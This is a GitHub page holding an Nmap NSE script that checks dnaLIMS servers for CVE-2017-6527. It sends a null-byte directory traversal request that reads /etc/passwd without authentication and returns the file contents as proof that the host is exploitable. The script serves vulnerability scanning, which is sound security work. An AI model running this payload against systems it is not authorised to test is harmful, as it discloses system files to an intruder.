-
Notifications
You must be signed in to change notification settings - Fork 2
/
783-http-vuln-cve2017-6527.nse
95 lines (85 loc) · 3.5 KB
/
783-http-vuln-cve2017-6527.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
description = [[
dnaLIMS is prone to the Directory Traversal attack.
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]]
---
-- @usage
-- nmap --script http-vuln-cve2017-6527 <url>
--
-- @args
-- http-vuln-cve2017-6527.uri
-- Default: '/' (Suggested)
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | http-vuln-cve2017-6527
-- | VULNERABLE:
-- | dnaLIMS is prone to the Directory Traversal attack.
-- | State: VULNERABLE (Exploitable)
-- | IDs:
-- | CVE: CVE-2017-6527
-- | CWE: 22
-- | The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
-- | This allows an unauthenticated attacker to retrieve files on the operating system accessible by
-- | the permissions of the web server. This page also does not require authentication, allowing
-- | any person on the Internet to exploit this vulnerability.
-- |
-- | References:
-- | https://www.cvedetails.com/cve/CVE-2017-6527
-- | https://www.cvedetails.com/cwe-details/22/cwe.html
---
author = "Rewanth Cool"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")
action = function(host, port)
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
local vulnPath = "cgi-bin/dna/viewAppletFsa.cgi?seqId=../../../../../../etc/passwd%00&Action=blast&hidenav=1"
-- Exploiting the vulnerability
local response = http.get( host, port, uri..vulnPath )
stdnse.debug1(string.format("GET request being processed with payload on %s", host..uri..vulnPath))
if( response.status == 200 ) then
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = "dnaLIMS is prone to the Directory Traversal attack.",
state = vulns.STATE.NOT_VULN,
description = [[
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]],
IDS = {
CVE = "CVE-2017-6527",
CWE = "22",
references = {
"https://www.cvedetails.com/cve/CVE-2017-6527",
"https://www.cvedetails.com/cwe-details/22/cwe.html"
},
dates = {
disclosure = {
year = "2017",
month = "03",
day = "09"
},
}
}
}
-- Matching the /etc/passwd pattern
if string.match( response.body, "([^:]+):([^:]+):([^:]+):([^:]+)::?([^:]+):([^:]+):([^:]+)" ) then
vuln.state = vulns.STATE.EXPLOIT
vuln.exploit_results = response.body
return vulnReport:make_output(vuln)
end
end
end